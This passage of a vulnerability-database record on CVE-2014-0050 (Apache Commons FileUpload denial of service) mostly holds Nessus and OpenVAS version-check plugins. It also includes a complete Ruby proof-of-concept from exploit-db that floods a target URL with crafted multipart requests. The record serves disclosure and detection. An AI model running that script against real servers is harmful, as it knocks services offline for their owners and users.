AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.5.4\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.5.4\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.0.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF10\",\"11.2.1HF16\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF16\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF16\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:04:47", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=862781", "http://support.novell.com/security/cve/CVE-2014-0050.html"], "pluginID": "73609", "description": "This update fixes a security issue with jakarta-commons-fileupload :\n\n - denial of service due to too-small buffer size used (CVE-2014-0050). (bnc#862781)", "edition": 4, "reporter": "Tenable", "published": "2014-04-18T00:00:00", "title": "SuSE 11.3 Security Update : jakarta-commons-fileupload (SAT Patch Number 9087)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2015-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload-javadoc"], "id": "SUSE_11_JAKARTA-COMMONS-FILEUPLOAD-140403.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73609", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73609);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/01/13 15:30:41 $\");\n\n script_cve_id(\"CVE-2014-0050\");\n\n script_name(english:\"SuSE 11.3 Security Update : jakarta-commons-fileupload (SAT Patch Number 9087)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a security issue with jakarta-commons-fileupload :\n\n - denial of service due to too-small buffer size used\n (CVE-2014-0050). (bnc#862781)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0050.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9087.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"jakarta-commons-fileupload-1.1.1-1.37.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"jakarta-commons-fileupload-javadoc-1.1.1-1.37.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:09:06", "references": ["http://www-01.ibm.com/support/docview.wss?uid=swg24029452#CF028", "http://www-01.ibm.com/support/docview.wss?uid=swg24034497#CF12", "http://www-01.ibm.com/support/docview.wss?uid=swg21672575", "http://www.nessus.org/u?12fd87aa"], "pluginID": "74293", "description": "The version of IBM WebSphere Portal on the remote host is affected by a denial of service vulnerability in the Apache Commons FileUpload library that allows an attacker to cause the application to enter an infinite loop.", "edition": 5, "reporter": "Tenable", "published": "2014-06-03T00:00:00", "title": "IBM WebSphere Portal Apache Commons FileUpload DoS", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/a:ibm:websphere_portal"], "id": "WEBSPHERE_PORTAL_CVE-2014-0050.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74293", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74293);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/08/06 14:03:14\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"IBM WebSphere Portal Apache Commons FileUpload DoS\");\n script_summary(english:\"Checks for installed patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has web portal software installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of IBM WebSphere Portal on the remote host is affected by\na denial of service vulnerability in the Apache Commons FileUpload\nlibrary that allows an attacker to cause the application to enter an\ninfinite loop.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21672575\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24029452#CF028\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24034497#CF12\");\n # https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_fixes_available_for_vulnerability_in_apache_commons_fileupload_contained_in_ibm_websphere_portal_cve_2014_0050?lang=en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?12fd87aa\");\n script_set_attribute(attribute:\"solution\", value:\n\"For 6.1.x, first upgrade to either : Fix Pack 6.1.0.6 CF27 or Fix Pack\n6.1.5.3 CF27; then apply Interim Fixes PI14025, PI14027, PI14028,\nPI14029, PI14086, PI14150, PI14812, PI15187, and PI17908.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_portal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"websphere_portal_installed.nbin\");\n script_require_keys(\"installed_sw/IBM WebSphere Portal\");\n exit(0);\n}\n\ninclude(\"websphere_portal_version.inc\");\n\nefixes = \"PI14025, PI14027, PI14028, PI14029, PI14086, PI14150, PI14812, PI15187, PI17908\";\n\nwebsphere_portal_check_version(\n checks:make_array(\n \"6.1.5.0, 6.1.5.3, CF27\", make_list(efixes),\n \"6.1.0.0, 6.1.0.6, CF27\", make_list(efixes),\n \"6.0.0.0, 6.0.0.1\", make_list(efixes)\n ),\n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:24", "references": ["http://advisories.mageia.org/MGASA-2014-0109.html", "http://advisories.mageia.org/MGASA-2014-0110.html"], "pluginID": "73003", "description": "Updated apache-commons-fileupload packages fix security vulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java could enter an infinite loop while processing a multipart request with a crafted Content-Type, resulting in a denial-of-service condition (CVE-2014-0050).\n\nTomcat 7 includes an embedded copy of the Apache Commons FileUpload package, and was affected as well.\n\nAdditionally a build problem with maven was discovered, fixed maven packages is also being provided with this advisory.", "edition": 5, "reporter": "Tenable", "published": "2014-03-14T00:00:00", "title": "Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tomcat-admin-webapps", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tomcat-docs-webapp", "p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api", "p-cpe:/a:mandriva:linux:tomcat-javadoc", "p-cpe:/a:mandriva:linux:tomcat-el-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload", "p-cpe:/a:mandriva:linux:tomcat-lib", "p-cpe:/a:mandriva:linux:tomcat", "p-cpe:/a:mandriva:linux:maven", "p-cpe:/a:mandriva:linux:tomcat-webapps", "p-cpe:/a:mandriva:linux:tomcat-jsvc", "p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc", "p-cpe:/a:mandriva:linux:maven-javadoc"], "id": "MANDRIVA_MDVSA-2014-056.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73003", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:056. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73003);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/19 20:59:18\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"MDVSA\", value:\"2014:056\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-fileupload packages fix security \nvulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition\n(CVE-2014-0050).\n\nTomcat 7 includes an embedded copy of the Apache Commons FileUpload\npackage, and was affected as well.\n\nAdditionally a build problem with maven was discovered, fixed maven\npackages is also being provided with this advisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0109.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0110.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:maven-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-commons-fileupload-javadoc-1.2.2-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"maven-javadoc-3.0.4-29.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-admin-webapps-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-docs-webapp-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-el-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-javadoc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsp-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsvc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-lib-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-servlet-3.0-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-webapps-7.0.41-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T15:04:57", "osvdbidlist": ["102945"], "references": [], "edition": 1, "description": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service. CVE-2014-0050. Dos exploits for multiple platform", "reporter": "Trustwave's SpiderLabs", "published": "2014-02-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "EDB-ID:31615", "href": "https://www.exploit-db.com/exploits/31615/", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\r\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n \tputs \"\"\r\n puts \"#################################################################################\"\r\n\tputs \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n\tputs \"# #\"\r\n\tputs \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n\tputs \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n\tputs \"# of assisting system administrators in evaluating whether or not #\"\r\n\tputs \"# their applications are vulnerable to this issue. #\"\r\n\tputs \"# #\"\r\n\tputs \"# Please use responsibly. #\"\r\n\tputs \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = \"\"\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs \"\"\r\n\tputs \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n\tputs \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs \"\"\r\n\t\tputs \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n\t\tputs \"\"\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs \"Request Launched\"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = uri.scheme==\"https\"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n\treq.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n\treq.body = \"b\"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs \"Timeout - continuing DoS...\"\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31615/"}], "openvas": [{"lastseen": "2018-09-01T23:54:32", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html", "2014-2183"], "pluginID": "1361412562310867519", "description": "Check for the Version of apache-commons-fileupload", "edition": 4, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-02-20T00:00:00", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2183", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310867519", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867519", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867519\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:05:45 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2183\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2183\");\n script_xref(name: \"URL\" , value: 